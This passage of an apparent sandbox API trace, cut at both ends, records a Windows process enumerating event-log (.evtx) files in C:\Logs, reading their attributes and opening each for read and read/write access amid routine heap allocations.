0x71ca0 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.432] AreFileApisANSI () returned 1 [0072.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0072.432] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.432] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.433] AreFileApisANSI () returned 1 [0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 56 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.433] AreFileApisANSI () returned 1 [0072.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0072.434] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.434] GetFileType (hFile=0x420) returned 0x1 [0072.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.434] CloseHandle (hObject=0x420) returned 1 [0072.435] AreFileApisANSI () returned 1 [0072.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0072.435] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.435] GetFileType (hFile=0x420) returned 0x1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.435] CloseHandle (hObject=0x420) returned 1 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.436] AreFileApisANSI () returned 1 [0072.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0072.436] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.436] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0072.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.437] AreFileApisANSI () returned 1 [0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", lpUsedDefaultChar=0x0) returned 55 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.437] AreFileApisANSI () returned 1 [0072.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0072.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0072.438] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.438] GetFileType (hFile=0x420) returned 0x1 [0072.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.438] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.438] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.438] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.438] CloseHandle (hObject=0x420) returned 1 [0072.438] AreFileApisANSI () returned 1 [0072.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0072.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0072.439] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.439] GetFileType (hFile=0x420) returned 0x1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.439] CloseHandle (hObject=0x420) returned 1 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.439] AreFileApisANSI () returned 1 [0072.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75fa8 [0072.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, 